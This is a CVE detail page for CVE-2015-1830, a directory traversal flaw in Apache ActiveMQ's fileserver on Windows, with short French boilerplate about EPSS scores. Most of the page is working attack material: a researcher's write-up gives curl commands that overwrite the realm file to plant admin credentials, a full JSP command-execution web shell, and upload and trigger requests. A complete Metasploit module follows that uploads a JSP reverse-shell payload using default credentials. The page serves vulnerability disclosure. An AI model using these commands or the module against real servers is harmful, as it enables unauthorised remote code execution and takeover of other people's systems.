CVE-2015-1830 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter. An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution. Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes: <bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping"> <property name="constraint" ref="securityConstraint"> <property name="pathSpec" value="/api/*,/admin/*,*.jsp"> </property></property> </bean> Effectively blocking the upload of JSP files into contexts that will allow them to execute. I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials: $ cat jetty-realm.properties hacker: hacker, admin $ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties This seems to have the disadvantage of requiring a reboot of the server to take effect. I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot. The attacker can then take a standard JSP shell: $ cat cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context: $ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp And pop a calc on the server: $ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe Exploiting non-Windows servers All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked. That said, clients can specify the uploadUrl for a blob transfer, e.g.: tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers. Resolution The ActiveMQ project has released an advisory and patches. This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind. It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload', 'Description' => %q{ This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. The module tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ credentials admin:admin (or other credentials provided by the user). It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell. }, 'Author' => [ 'David Jorm', # Discovery and exploit 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ [ 'CVE', '2015-1830' ], [ 'EDB', '40857'], [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ] ], 'Privileged' => false, 'Platform' => %w{ win }, 'Targets' => [ [ 'Windows Java', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ], ], 'DisclosureDate' => '2015-08-19', 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 8161, 'PAYLOAD' => 'java/jsp_shell_reverse_tcp' }, 'DefaultTarget' => 0)) register_options([ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('PATH', [true, 'Traversal path', '/fileserver/..\\admin\\']), OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin']) ]) end def check print_status("Running check...") testfile = Rex::Text::rand_text_alpha(10) testcontent = Rex::Text::rand_text_alpha(10) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'PUT', 'data' => "<% out.println(\"#{testcontent}\");%>" }) res1 = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'GET' }) if res1 && res1.body.include?(testcontent) send_request_cgi( opts = { 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'DELETE' }, timeout = 1 ) return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status("Uploading payload...") testfile = Rex::Text::rand_text_alpha(10) vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails. send_request_cgi({ 'uri' => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'PUT', 'data' => payload.encoded }) print_status("Payload sent. Attempting to execute the payload.") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"), 'headers' => { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }, 'method' => 'GET' }) if res && res.code == 200 print_good("Payload executed!") else fail_with(Failure::PayloadFailed, "Failed to execute the payload") end end end